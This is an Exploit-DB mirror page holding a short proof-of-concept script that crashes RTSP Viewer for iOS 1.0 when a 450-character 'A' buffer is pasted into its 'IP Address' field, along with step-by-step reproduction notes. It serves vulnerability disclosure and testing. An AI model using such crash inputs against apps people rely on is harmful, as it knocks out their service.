exploit-db-mirror/exploits/windows/dos/48729.py
Offensive Security 9384c59418 DB: 2020-08-05
4 changes to exploits/shellcodes

Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)
RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)
Pi-hole 4.3.2 - Remote Code Execution (Authenticated)
Daily Expenses Management System 1.0 - 'username' SQL Injection
2020-08-05 05:01:47 +00:00

26 lines
No EOL
788 B
Python
Executable file

# Exploit Title: RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)
# Author: Luis Martinez
# Discovery Date: 2020-08-03
# Vendor Homepage: https://appadvice.com/app/rtsp-viewer/1056996189
# Software Link: App Store for iOS devices
# Tested Version: 1.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 13.5.1
# Steps to Produce the Crash:
# 1.- Run python code: RTSP_Viewer_for_iOS_1.0.py
# 2.- Copy content to clipboard
# 3.- Open "RTSP Viewer for iOS"
# 4.- Touch the screen
# 5.- Clic add (+)
# 6.- Name > "l4m5"
# 7.- Paste ClipBoard on "IP Address"
# 8.- Clic Back
# 9.- Message save is successed > OK
# 10.- Click created connection (AAAA...)
# 11.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 450
print (buffer)